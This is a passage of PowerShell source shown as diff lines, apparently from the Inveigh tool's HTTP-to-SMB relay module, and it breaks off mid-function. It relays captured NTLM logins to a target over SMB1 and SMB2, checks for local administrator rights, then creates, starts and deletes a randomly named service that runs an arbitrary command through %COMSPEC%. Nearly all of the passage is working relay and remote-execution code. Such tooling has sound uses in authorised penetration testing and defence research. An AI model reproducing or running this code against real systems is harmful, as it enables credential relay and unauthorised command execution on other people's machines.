- $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_relay_response_stream.Flush()
- $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
- {
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- }
- else
- {
- $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
- $SMB_relay_failed = $true
- $SMB_relay_socket.Close()
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
- }
-
- }
-
- if(!$SMB_relay_failed)
- {
-
- if(!$Service)
- {
- $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
- $SMB_service = $SMB_service_random -replace "-00",""
- $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
- $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
- $SMB_service_random += '00-00-00-00-00'
- $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $SMB_service = $Service
- $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
-
- if([Bool]($SMB_service.Length % 2))
- {
- $SMB_service_bytes += 0x00,0x00
- }
- else
- {
- $SMB_service_bytes += 0x00,0x00,0x00,0x00
-
- }
-
- }
-
- $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
- $Command = "%COMSPEC% /C `"" + $Command + "`""
- [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$PsExec_command += "{0:X2}-00-" -f $_}
-
- if([Bool]($Command.Length % 2))
- {
- $PsExec_command += '00-00'
- }
- else
- {
- $PsExec_command += '00-00-00-00'
- }
-
- $PsExec_command_bytes = $PsExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $PsExec_command_length_bytes = [System.BitConverter]::GetBytes($PsExec_command_bytes.Length / 2)
-
- $SMB_path = "\\" + $Target + "\IPC$"
-
- if($SMB_version -eq 'SMB1')
- {
- $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
- }
- else
- {
- $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
- }
-
- $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
- $SMB_client_stream = $SMB_relay_socket.GetStream()
- $SMB_split_index = 4256
-
- if($SMB_version -eq 'SMB1')
- {
- $SMB_client_stage = 'TreeConnectAndXRequest'
-
- :SMB_execute_loop while ($SMB_client_stage -ne 'Exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'TreeConnectAndXRequest'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'CreateAndXRequest'
- }
-
- 'CreateAndXRequest'
- {
- $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
- $SMB_tree_ID = $SMB_client_receive[28,29]
- $packet_SMB_header = Get-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'RPCBind'
- }
-
- 'RPCBind'
- {
- $SMB_FID = $SMB_client_receive[42,43]
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'OpenSCManagerW'
- }
-
- 'ReadAndXRequest'
- {
- Start-Sleep -m 150
- $packet_SMB_header = Get-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBReadAndXRequest
- $packet_SMB_data["SMBReadAndXRequest_FID"] = $SMB_FID
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = $SMB_client_stage_next
- }
-
- 'OpenSCManagerW'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'CheckAccess'
- }
-
- 'CheckAccess'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
- }
-
- if($SCM_data.Length -lt $SMB_split_index)
- {
- $SMB_client_stage = 'CreateServiceW'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_First'
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
- {
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'CreateServiceW'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'CreateServiceW_First'
- {
- $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
- $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
- $SMB_split_index_tracker = $SMB_split_index
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage_final -le 2)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_split_stage = 2
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Middle'
- {
- $SMB_split_stage++
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
- $SMB_split_index_tracker += $SMB_split_index
- $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
- $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
-
- if($SMB_split_stage -ge $SMB_split_stage_final)
- {
- $SMB_client_stage = 'CreateServiceW_Last'
- }
- else
- {
- $SMB_client_stage = 'CreateServiceW_Middle'
- }
-
- }
-
- 'CreateServiceW_Last'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
- $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'StartServiceW'
- }
-
- 'StartServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")
- }
-
- $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
- $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target")
- $SMB_service_context_handle = $SMB_client_receive[92..111]
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'DeleteServiceW'
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
- $SMB_relay_failed = $true
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")
- }
-
- }
- else
- {
- $SMB_relay_failed = $true
- }
-
- }
-
- 'DeleteServiceW'
- {
-
- if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
- {
- $inveigh.console_queue.Add("SMB relay command executed on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")
- }
-
- }
- elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service failed to start on $Target")
- }
-
- }
-
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'ReadAndXRequest'
- $SMB_client_stage_next = 'CloseServiceHandle'
- $SMB_close_service_handle_stage = 1
- }
-
- 'CloseServiceHandle'
- {
-
- if($SMB_close_service_handle_stage -eq 1)
- {
- $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
- $SMB_close_service_handle_stage++
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")
- }
-
- }
- else
- {
- $SMB_client_stage = 'CloseRequest'
- $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
- }
-
- $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
- $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
- $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- }
-
- 'CloseRequest'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBCloseRequest 0x00,0x40
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'TreeDisconnect'
- }
-
- 'TreeDisconnect'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBTreeDisconnectRequest
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Logoff'
- }
-
- 'Logoff'
- {
- $packet_SMB_header = Get-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID
- $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
- $packet_SMB_data = Get-PacketSMBLogoffAndXRequest
- $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'Exit'
- }
-
- }
-
- if($SMB_relay_failed)
- {
- $inveigh.console_queue.Add("SMB relay failed on $Target")
- $SMB_client_stage = 'Exit'
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay failed on $Target")
- }
-
- }
-
- }
-
- }
- else
- {
-
- $SMB_client_stage = 'TreeConnect'
-
- :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
- {
-
- switch ($SMB_client_stage)
- {
-
- 'TreeConnect'
- {
- $SMB2_message_ID = 4
- $packet_SMB2_header = Get-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
- $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00
- $packet_SMB2_data = Get-PacketSMB2TreeConnectRequest $SMB_path_bytes
- $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
- $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
- $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
- $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
- $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
- $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length)
- $SMB_client_stream.Flush()
- $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length)
- $SMB_client_stage = 'CreateRequest'
- }
-
- 'CreateRequest'
- {
- $SMB2_tree_ID = 0x01,0x00,0x00,0x00
- $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
- $SMB2_message_ID += 1
